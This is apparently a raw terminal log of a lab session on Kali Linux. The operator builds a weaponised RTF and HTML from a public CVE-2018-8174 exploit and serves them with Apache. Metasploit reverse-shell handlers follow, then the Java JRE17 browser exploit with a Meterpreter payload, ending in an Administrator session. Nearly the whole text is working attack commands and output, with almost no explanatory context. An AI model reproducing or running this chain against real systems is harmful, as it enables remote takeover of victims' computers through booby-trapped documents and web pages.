
git clone https://github.com/iBearcat/CVE-2018-8174_EXP.git
┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# unzip CVE-2018-8174_EXP-master.zip
Archive: CVE-2018-8174_EXP-master.zip
d055e4d56920f10303f9a8879c8eb47e22abb01d
creating: CVE-2018-8174_EXP-master/
inflating: CVE-2018-8174_EXP-master/CVE-2018-8174.py
inflating: CVE-2018-8174_EXP-master/README.md
┌──(root㉿kali-2024)-[/home/ljs/Desktop/CVE-2018-8174_EXP-master]
└─# ls
CVE-2018-8174.py README.md
┌──(root㉿kali-2024)-[/home/ljs/Desktop/CVE-2018-8174_EXP-master]
└─# python2 CVE-2018-8174.py -u http://192.168.234.141/exploit.html -o hack.rtf -i 192.168.234.141 -p 4444
UNICODE_URL len 138 , need to pad ...
Generated hack.rtf successfully
!!! Completed !!!
Parameter details:


┌──(root㉿kali-2024)-[/home/ljs/Desktop/CVE-2018-8174_EXP-master]
└─# cp exploit.html /var/www/html/
┌──(root㉿kali-2024)-[/home/ljs/Desktop/CVE-2018-8174_EXP-master]
└─# service apache2 start 
msf6 exploit(multi/handler) > back
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.234.141
LHOST => 192.168.234.141
msf6 exploit(multi/handler) > exploit
http://192.168.234.141/exploit.html





Installation process: just keep clicking Next.
msf6 exploit(multi/handler) > use exploit/multi/browser/java_jre17_driver_manager
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/browser/java_jre17_driver_manager) > show options
Module options (exploit/multi/browser/java_jre17_driver_manager):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.79.135 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Generic (Java Payload)
View the full module info with the info, or info -d command.
msf6 exploit(multi/browser/java_jre17_driver_manager) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/bind_aws_instance_connect normal No Unix SSH Shell, Bind Instance Connect (via AWS API)
1 payload/generic/custom normal No Custom Payload
2 payload/generic/shell_bind_aws_ssm normal No Command Shell, Bind SSM (via AWS API)
3 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
4 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
5 payload/generic/ssh/interact normal No Interact with Established SSH Connection
6 payload/java/jsp_shell_bind_tcp normal No Java JSP Command Shell, Bind TCP Inline
7 payload/java/jsp_shell_reverse_tcp normal No Java JSP Command Shell, Reverse TCP Inline
8 payload/java/meterpreter/bind_tcp normal No Java Meterpreter, Java Bind TCP Stager
9 payload/java/meterpreter/reverse_http normal No Java Meterpreter, Java Reverse HTTP Stager
10 payload/java/meterpreter/reverse_https normal No Java Meterpreter, Java Reverse HTTPS Stager
11 payload/java/meterpreter/reverse_tcp normal No Java Meterpreter, Java Reverse TCP Stager
12 payload/java/shell/bind_tcp normal No Command Shell, Java Bind TCP Stager
13 payload/java/shell/reverse_tcp normal No Command Shell, Java Reverse TCP Stager
14 payload/java/shell_reverse_tcp normal No Java Command Shell, Reverse TCP Inline
15 payload/multi/meterpreter/reverse_http normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
16 payload/multi/meterpreter/reverse_https normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
msf6 exploit(multi/browser/java_jre17_driver_manager) > java/meterpreter/reverse_tcp
Interrupt: use the 'exit' command to quit
msf6 exploit(multi/browser/java_jre17_driver_manager) > set paylod java/meterpreter/reverse_tcp
[!] Unknown datastore option: paylod. Did you mean PAYLOAD?
paylod => java/meterpreter/reverse_tcp
msf6 exploit(multi/browser/java_jre17_driver_manager) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf6 exploit(multi/browser/java_jre17_driver_manager) > set LHOST 192.168.1.53
LHOST => 192.168.1.53
msf6 exploit(multi/browser/java_jre17_driver_manager) > jobs -K
Stopping all jobs...
msf6 exploit(multi/browser/java_jre17_driver_manager) > run
┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# lsof -i:4444
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
ruby 179670 root 8u IPv4 425867 0t0 TCP *:4444 (LISTEN)
┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# kill -9 179670




msf6 exploit(multi/browser/java_jre17_driver_manager) > sessions -i 6
meterpreter > getuid
Server username: Administrator